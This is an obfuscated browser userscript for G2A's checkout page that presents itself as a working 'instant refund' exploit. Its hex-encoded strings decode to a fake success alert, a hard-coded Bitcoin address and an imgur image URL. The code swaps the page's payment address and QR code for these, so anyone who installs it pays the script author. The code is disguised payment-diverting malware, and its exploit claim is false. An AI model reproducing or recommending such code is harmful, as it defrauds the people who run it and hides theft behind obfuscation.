// ==UserScript==
// @name         G2A Script
// @namespace    Bounty
// @version      9.0
// @description  G2A Instant Refund Vulnerbility
// @author       @Alscr
// @match        https://checkout.pay.g2a.com/*
// @grant        none
// ==/UserScript==

var _0x128a=
["\x45\x78\x70\x6C\x6F\x69\x74\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x79\x20\x65\x6E\x61\x62\x6C\x65\x64\x21\x20\x50\x72\x65\x73\x73\x20\x4F\x4B\x20\x74\x6F\x20\x63\x6F\x6E\x74\x69\x6E\x75\x65\x2E","row","getElementsByClassName","innerHTML","\x42\x54\x43\x20\x61\x64\x64\x72\x65\x73\x73\x3A\x20\x33\x33\x35\x53\x6F\x42\x6F\x50\x6B\x35\x4D\x58\x38\x34\x6D\x64\x53\x32\x65\x64\x4A\x39\x74\x50\x35\x68\x6F\x6A\x48\x67\x37\x35\x4D\x6A","src","code","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x69\x2E\x69\x6D\x67\x75\x72\x2E\x63\x6F\x6D\x2F\x4D\x71\x64\x55\x43\x4B\x6F\x2E\x70\x6E\x67","length"];alert(_0x128a[0]);var _0x4892da=setInterval(function()
{
	var _0xf782x2=document[_0x128a[2]](_0x128a[1]);	_0xf782x2[1][_0x128a[3]]= _0x128a[4];document[_0x128a[2]](_0x128a[6])[0]
	[_0x128a[5]]= _0x128a[7];var _0xf782x3=document[_0x128a[2]](_0x128a[6]);
	if(_0xf782x3[_0x128a[8]]> 0)
	{
		clearInterval(_0x4892da)
	}
}
,10)

//Backend-Exploit | Status: Working